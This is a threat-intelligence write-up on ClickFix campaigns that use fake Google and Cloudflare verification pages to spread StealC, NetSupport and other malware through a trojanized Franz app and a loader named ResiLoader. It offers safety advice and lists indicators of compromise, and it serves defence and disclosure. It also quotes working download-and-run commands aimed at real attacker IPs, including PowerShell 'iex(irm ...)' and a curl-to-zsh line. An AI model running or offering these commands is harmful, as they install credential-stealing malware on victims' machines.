threat_intelligence1811 wordsRead on Arc Codex

Fake Google and Cloudflare verification pages spread multiple malware families

ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices. A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system. We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer. Before we look at the technical details, here’s how to avoid becoming the next victim. How to stay safe ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple: - Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does. - Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem. - Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly. - Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them. - Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels. Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages. Technical analysis The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads. Different lures, one goal Most of the campaigns share several characteristics: - Use of the folder C:\ProgramData\Zooms to extract later stages - PowerShell ClickFix commands that follow similar patterns - Use of Cloudflare R2 buckets to deliver payloads - IP addresses hosted by the ASN Dedik Services Limited - HTML responses containing only the phrase "hehe" These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets. The final command copied by the user usually falls into this pattern: powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)” The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442. To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework. We observed these ClickFix campaigns being distributed through: - Old websites that have likely expired and been repurchased by the actor(s). - CloudFlare Pages ( .pages.dev domains). - Compromised websites. - Fake services, for example related to QR code or web file access. Google ClickFix lures The actors behind these campaigns use various Google-related HTML pages and kits. One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign. Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example: /conf/captcha.html?zoneid=10420852 /wincapbot/nobot.html /xmr/trkuste.php?zone=5327134 bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop In this case, the functions related to ClickFix are implemented in the class CustomCaptcha . The command is present in clear without any obfuscation. Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains. In this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime , RemoteVault , BeaconDispatcher , Clipboard , TokenController , and PanelController . The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally. We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary. The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute. In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues. In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command: {"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} Other lures The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure. The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure. We have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed. We also detected some specifically created fake services websites. For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot. In this case the command is encoded in base-64: PowerShell downloader The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1 . We have detected several variations of this script, but recent versions do the following: - Create the folder C:\ProgramData\Zooms . - Download the next stage from a CloudFlare bucket and save it in C:\ProgramData\Zooms . In some variants of the script, the next stage is downloaded directly from an IP. - Send the information of the compromised machine to http://{IP}/dl-callback . In some variants of the script, this part is not present. The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer. | File Distributed | Malware distributed | libEGL.zip , Safe-1.zip | Trojanized Electron App, ResiLoader and StealC | Test.msi | Deno Loader and PowerShell Stealer | arworks.zip | Amatera Stealer | water-night.zip | Remus Stealer | Setup.msi , Invintrum_first.msi | NetSupport | traffic1.msi | CastleLoader | ibrowser.exe | Rust Stealer | We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using Deno to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post. Trojanized Electron app downloads ResiLoader In this case, the ZIP was downloaded from: pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip After extraction to: C:\ProgramData\Zooms\libEGL.zip_ext The zip contains a trojanized version of the open-source messaging app called “Franz”: The malicious code is implemented in the index.js file: The downloader performs the following operations: - Decode the strings with the function HC() . - Reads readme.txt , expects a campaign key of the formAAAA-BBBB , returns it as an array of tokens. In this case the name isresiloader-1 and for this we call “ResiLoader” the downloaded DLL. - Reads %APPDATA%\setup.txt ; if absent, generates a random 8-char string and persists it. - Obtaining persistence using app.setLoginItemSettings . - Sends a POST request to https[:]//completstep[.]com/api/ and elaborate the JSON response- If task.e is present, it executeseval(task.e) ; it allows the attacker to execute arbitrary JavaScript code. - If task.files is present, create%TEMP%\<Date.now()>\ , decode and write each file; if any filename ends in.exe , run it viachild_process.exec . - If In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe : {"task":{"name":"JUNE18USY","files":{ "msys-2.0.dll":"<base64>", "msys-crypto-3.dll":"<base64>", "msys-gcc_s-seh-1.dll":"<base64>", "ssh-add.exe":"<base64>" }}} After, the executable was executed with: C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" ResiLoader The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC. We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous readme.txt . The loader contains several strings, some clear and some encrypted. After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader. MANPO: ReadModule len=... MANPO: magicOffset=... … PERS: FAIL all file copies failed, skipping run key PERS: FAIL both HKLM and HKCU Run key writes failed … RUNPE: CreateProcess failed RUNPE: PEB patched RUNPE: VirtualAllocEx failed … POST: RunForever exited (unexpected) POST: entering RunForever POST: hollow= The loader performs the following operations: - Extract the encoded blob containing two payloads reading the marker AtLorenBase and the length of the encoded blob. After, it decodes the blob and decrypts the driverpcdhost.sys (OPSWAT AppRemover Driver) and StealC payload using a custom decryption algorithm. - Terminate more than 140 processes related to EDR/AV processes using the dropped driver. - Perform UAC bypass via ICMLuaUtil Elevated COM Interface. - Create a folder C:\ProgramData\Google Update , copying itself; adding persistence using the RUN Registry Key cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer. IOCs Hash 72907d0ca3258365838626f6a8d993a6 : ResiLoader DLL 0234E3188F2883A438B3F2BEAB7A78B2 : StealC 6a9ac6b3fff7b695dbd4df6ff7f6c516 : Remus 206ce339febca0c3bcc850f42595fc63 : Amatera Stealer eee416efcb1e33f220cdb4b05496a07a : NetSupport RAT b8d53740024d126cb55f83854335a4ab : Rust Stealer Domains Distribute ClickFix pages: onegeekworld[.]com thefirmos[.]com antibotv3[.]com centralwildcats[.]com cloud.antibotv3[.]com cloudautosolutions[.]com sunseekersupply[.]com 123clocks[.]com orcanegames[.]com rwmonitoring[.]com 100furniture[.]com nepalcharchaa[.]com p-floribunds.pages[.]dev pg-altirade2.pages[.]dev pg-cordivant-m6.pages[.]dev g-luminence.pages[.]dev generator-qrcode[.]online regdev-google[.]com khosla[.]capital eorgke09054909j[.]com dropboxi[.]com CloudFlare buckets used for payload distribution: pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev pub-620528e2dc874e16937673265aa23d39.r2[.]dev pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev pub-9682d5896df841679c5a17eb41273f89.r2[.]dev pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev unitedstateverif[.]com : payload distribution bigflaredefence[.]com : payload distribution popularcard[.]shop : Rust Stealer C2 xzz[.]proxygrid[.]cc : Amatera Stealer C2 completstep[.]com : Loader C2 eventlogerps1[.]ink : Deno Loader be231ro963[.]com : Deno Loader IPs IP used for payload distribution: 151.240.151[.]126 85.239.149[.]16 85.239.149[.]40 93.152.224[.]29 151.240.151[.]46 93.152.224[.]167 85.239.149[.]78 192.69.195[.]131 135.181.171[.]40 94.26.83[.]206 91.92.34[.]128 85.239.144[.]31 93.152.224[.]39 94.26.90[.]112 146.19.248[.]120 : StealC C2 Acknowledgements - Related domain reported: https://x.com/stop_spammerz/status/2070152741037477960 - Related domain reported: https://x.com/Yuki27183/status/2047354005605777850 - User infection reported on Reddit: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/ - Possible related infection chain https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026

How it works

Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content — general knowledge won't be enough. Score 70+ to count toward your certificate.

Questions are cached — you'll always get the same 5 for this article.